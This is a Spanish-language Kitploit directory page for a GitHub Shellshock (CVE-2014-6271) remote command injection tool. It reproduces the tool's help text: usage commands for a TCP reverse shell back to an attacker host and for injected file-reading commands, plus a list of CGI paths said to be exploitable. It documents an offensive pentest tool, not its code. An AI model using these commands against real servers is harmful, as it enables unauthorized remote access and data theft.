Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
-CVE-2014-6271-Shellshock-Remote-Command-Injection- — [CVE-2014-6271] Herramienta de inyección remota de comandos Shellshock de Apache para shell inverso rápido y navegación de archivos | Kitploit
Herramientas/GitHubGitHub/filipstudeny/-cve-2014-6271-shellshock-remote-command-injection-
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubfilipstudeny/-cve-2014-6271-shellshock-remote-command-injection-

-CVE-2014-6271-Shellshock-Remote-Command-Injection-

[CVE-2014-6271] Herramienta de inyección remota de comandos Shellshock de Apache para shell inverso rápido y navegación de archivos

Ver Repositorio
37hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

[CVE-2014-6271] Shellshock-Remote-Command-Injection

[CVE-2014-6271] Herramienta de Apache Shellshock de inyección remota de comandos para shell inversa rápida y navegación de archivos

Shellshock Apache remote exploit

Usage:
    ./Shellshock.py payload=reverse rhost=1.2.3.4 page=3 lhost=5.6.7.8 lport=1234
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="ls -la"
    ./Shellshock.py payload=files rhost=1.2.3.4 page=3 echo="cat file.txt"

Variables:
    Victim:
        rhost => IP de la víctima
        rport => PUERTO de la víctima 
        
    Attacker (For reverse shell):
        lhost => IP del atacante
        lport => PUERTO del atacante para shell inversa 
    
    Echo:
        echo => Comando personalizado a inyectar
        
        Examples:
            echo="ls -la"
            echo="cat file.txt"
        
    Config:
        pages => Páginas CGI vulnerables específicas 
            Exploitable pages:
                [0] /cgi-sys/entropysearch.cgi",
                [1] /cgi-sys/defaultwebpage.cgi",
                [2] /cgi-mod/index.cgi",
                [3] /cgi-bin/test.cgi",
                [4] /cgi-bin-sdb/printenv            
    Payloads:
        "reverse" => (unix universal) Shell inversa TCP (Requiere: rhost, lhost, lport)
        "files" => Leer y navegar por archivos (Requiere: rhost, echo)    
        
    Creado por Filip Studený
Descargar herramienta